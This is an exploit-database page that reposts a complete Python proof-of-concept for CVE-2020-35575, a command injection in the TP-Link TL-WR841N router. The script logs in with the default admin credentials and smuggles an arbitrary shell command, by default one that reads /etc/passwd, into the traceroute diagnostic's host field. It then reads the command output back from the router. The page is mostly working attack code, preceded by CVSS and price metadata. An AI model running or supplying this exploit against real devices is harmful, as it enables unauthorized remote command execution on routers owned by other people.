Advertisement






TP-Link TL-WR841N Command Injection

CVE Category Price Severity
CVE-2020-35575 CWE-78 $10,000 High
Author Risk Exploitation Type Date
Ahmet Cihangir High Remote 2021-06-25
CVSS EPSS EPSSP
CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060145

Below is a copy:

TP-Link TL-WR841N Command Injection
# Exploit Title: TP-Link TL-WR841N - Command Injection
# Date: 2020-12-13
# Exploit Author: Koh You Liang
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip
# Version: TL-WR841N 0.9.1 4.0
# Tested on: Windows 10
# CVE : CVE-2020-35575

import requests
import sys
import time

try:
    _ = sys.argv[2]
    payload = ' '.join(sys.argv[1:])
except IndexError:
    try:
        payload = sys.argv[1]
    except IndexError:
        print("[*] Command not specified, using the default `cat etc/passwd=`")
        payload = 'cat etc/passwd'

# Default credentials is admin:admin - replace with your own
cookies = {
    'Authorization': 'Basic YWRtaW46YWRtaW4='
}

headers = {
    'Host': '192.168.0.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'text/plain',
    'Content-Length': '197',
    'Origin': 'http://192.168.0.1',
    'Connection': 'close',
    'Referer': 'http://192.168.0.1/mainFrame.htm',
}

data1 = \
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)
print('[+] Sending payload...')

try:
    response1.text.splitlines()[0]
except IndexError:
    sys.exit('[-] Cannot get response. Please check your cookie.')
if response1.text.splitlines()[0] != '[error]0':
    sys.exit('[*] Router/Firmware is not vulnerable.')

data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)
print('[+] Receiving response from router...')
time.sleep(0.8) # Buffer time for traceroute to succeed

data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)

if '=:' in response3.text.splitlines()[3]:
    print('[-] Command not supported.')
else:
    print('[+] Exploit successful!')
    for line_number, line in enumerate(response3.text.splitlines()):
        try:
            if line_number == 3:
                print(line[12:])
            if line_number > 3 and line != '[error]0':
                print(line)
                if 'not known' in line:
                    break
        except IndexError:
            break
            

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum